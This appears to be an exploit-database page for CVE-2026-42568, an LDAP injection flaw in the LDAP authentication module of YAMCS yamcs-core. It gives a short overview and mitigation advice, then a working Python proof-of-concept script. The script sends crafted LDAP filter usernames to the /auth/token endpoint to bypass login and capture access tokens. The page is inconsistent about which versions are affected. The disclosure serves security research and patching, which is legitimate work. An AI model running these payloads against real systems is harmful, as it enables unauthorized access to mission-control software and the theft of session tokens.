Skip to main content
Home/Exploits/WebApps/YAMCS yamcs-core 5.12.7 – LDAP Injection
EXPLOIT HIGH (8.1)

YAMCS yamcs-core 5.12.7 – LDAP Injection

CVE ID: CVE-2026-42568
Vulnerability Type: Injection Vulnerability
Author: Daniel Miranda
Categories: WebApps

Overview

The YAMCS yamcs-core 5.12.7 vulnerability, identified as CVE-2026-42568, exposes systems to LDAP injection attacks. This security flaw allows attackers to manipulate LDAP queries, potentially gaining unauthorized access to sensitive information stored within the directory service.

Technical Details

LDAP injection occurs when an application incorporates unvalidated user input into an LDAP query. In the case of YAMCS yamcs-core 5.12.7, the vulnerability arises from insufficient input sanitization, enabling attackers to inject malicious LDAP statements. For instance, an attacker could submit a specially crafted input that alters the intended structure of the LDAP query, allowing them to bypass authentication or retrieve unauthorized data.

This manipulation can lead to various outcomes, including the exposure of user credentials, access to sensitive configuration data, or even the ability to modify directory entries. The exploit method typically involves crafting input that the application fails to validate, leading to unintended query execution.

Impact

The potential consequences of exploiting CVE-2026-42568 are severe. Successful LDAP injection attacks can result in data breaches, unauthorized access to critical systems, and the compromise of user accounts. Organizations relying on YAMCS for mission-critical operations may face operational disruptions, reputational damage, and compliance violations.

Mitigation

To protect against LDAP injection vulnerabilities, security professionals should implement robust input validation and sanitization mechanisms. All user inputs should be treated as untrusted, and special characters should be escaped or removed. Additionally, employing parameterized queries can significantly reduce the risk of injection attacks.

Regular security audits and code reviews are essential to identify and remediate potential vulnerabilities in the application. Keeping YAMCS and all related software up to date with the latest security patches will also help mitigate risks associated with known vulnerabilities like CVE-2026-42568. Organizations are encouraged to monitor their systems for unusual activities that may indicate an attempted exploit.

Proof of Concept (PoC)

poc.py 
# Exploit Title: YAMCS yamcs-core  5.12.7 - LDAP Injection 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-42568
# Category: Remote / Auth Bypass
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j

#!/usr/bin/env python3
"""
CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule
=========================================================
The username parameter in LdapAuthModule is inserted directly
into LDAP search filters without RFC 4515 escaping.

Root cause (LdapAuthModule.java):
    var filter = userFilter.replace("{0}", username);

With userFilter=(uid={0}) and username=*)(uid=*))(|(uid=*
Result: (uid=*)(uid=*))(|(uid=*) — universal match, auth bypass.

Only affects instances with LdapAuthModule configured.
=========================================================
"""

import requests
import sys
import json

def main():
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
    base = target.rstrip("/")

    print("=" * 65)
    print(" CVE-2026-42568 — YAMCS LDAP Injection PoC")
    print(f" Target: {target}")
    print(" Requires: LdapAuthModule configured in yamcs.yaml")
    print("=" * 65)

    payloads = [
        {
            "name": "Universal bypass",
            "username": "*)(uid=*))(|(uid=*",
            "password": "anything",
        },
        {
            "name": "Targeted bypass (admin)",
            "username": "admin)(|(objectClass=*",
            "password": "wrongpassword",
        },
        {
            "name": "Wildcard match",
            "username": "op*",
            "password": "anything",
        }
    ]

    for i, p in enumerate(payloads, 1):
        print(f"n[{i}] {p['name']}")
        print(f"     username: {p['username']}")
        print(f"     password: {p['password']}")

        try:
            resp = requests.post(f"{base}/auth/token",
                data={
                    "grant_type": "password",
                    "username": p["username"],
                    "password": p["password"]
                }, timeout=5)

            print(f"     HTTP:     {resp.status_code}")

            if resp.status_code == 200:
                token = resp.json().get("access_token", "")
                print(f"     [!!!] AUTH BYPASSED")
                if token:
                    print(f"     [!!!] Token: {token[:50]}...")
            elif resp.status_code == 401:
                print(f"     [-] 401 — LDAP may not be configured")
            elif resp.status_code == 403:
                print(f"     [+] 403 — Patched or LDAP disabled")

        except requests.exceptions.ConnectionError:
            print(f"     [-] Connection refused — is YAMCS running?")
        except Exception as e:
            print(f"     [-] Error: {e}")

    print("n" + "=" * 65)
    print(" Fix: Upgrade to yamcs-core >= 5.12.7")
    print("=" * 65)

if __name__ == "__main__":
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...